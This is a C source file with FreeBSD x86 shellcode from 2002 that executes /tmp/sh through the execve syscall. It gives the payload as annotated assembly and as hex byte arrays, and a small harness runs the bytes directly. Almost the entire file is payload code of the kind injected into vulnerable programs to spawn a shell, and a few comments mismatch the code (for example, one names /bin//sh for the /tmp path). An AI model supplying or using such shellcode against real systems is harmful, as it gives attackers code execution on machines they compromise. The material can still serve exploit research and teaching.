/* * FreeBSD shellcode - execve /tmp/sh * * Claes M. Nyberg 20020120 * * < [email protected] >, < [email protected] > */ /********************************************************** void main() { __asm__(" xorl %eax, %eax # eax = 0 pushl %eax # string ends with NULL pushl $0x68732f2f # push 'hs//' (//sh) pushl $0x706d742f # push 'pmt/' (/tmp) movl %esp, %ebx # ebx = argv[0] = string addr pushl %eax # argv[1] = NULL pushl %ebx # argv[0] = /bin//sh movl %esp, %edx # edx = &argv[0] pushl %eax # envp = NULL pushl %edx # &argv[0] pushl %ebx # *path = argv[0] pushl %eax # Dummy movb $0x3b, %al # al = 59 = execve int $0x80 # execve(argv[0], argv, NULL) xorl %eax, %eax # eax = 0 inc %eax # eax++ pushl %eax # Exit value = 1 pushl %eax # Dummy int $0x80 # exit(1); (eax is 1 = execve) "); } ************************************************************/ #include "stdio.h" #include "string.h" static char freebsd_code[] = "\x31\xc0" /* xorl %eax, %eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x74\x6d\x70" /* pushl $0x706d742f */ "\x89\xe3" /* movl %esp, %ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe2" /* movl %esp, %edx */ "\x50" /* pushl %eax */ "\x52" /* pushl %edx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xb0\x3b" /* movb $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xorl %eax, %eax */ "\x40" /* inc %eax */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\xcd\x80"; /* int $0x80 */ static char _freebsd_code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x74\x6d\x70\x89\xe3\x50" "\x53\x89\xe2\x50\x52\x53\x50\xb0" "\x3b\xcd\x80\x31\xc0\x40\x50\x50" "\xcd\x80"; void main(void) { void (*code)() = (void *)freebsd_code; printf("strlen code: %d\n", strlen(freebsd_code)); code(); }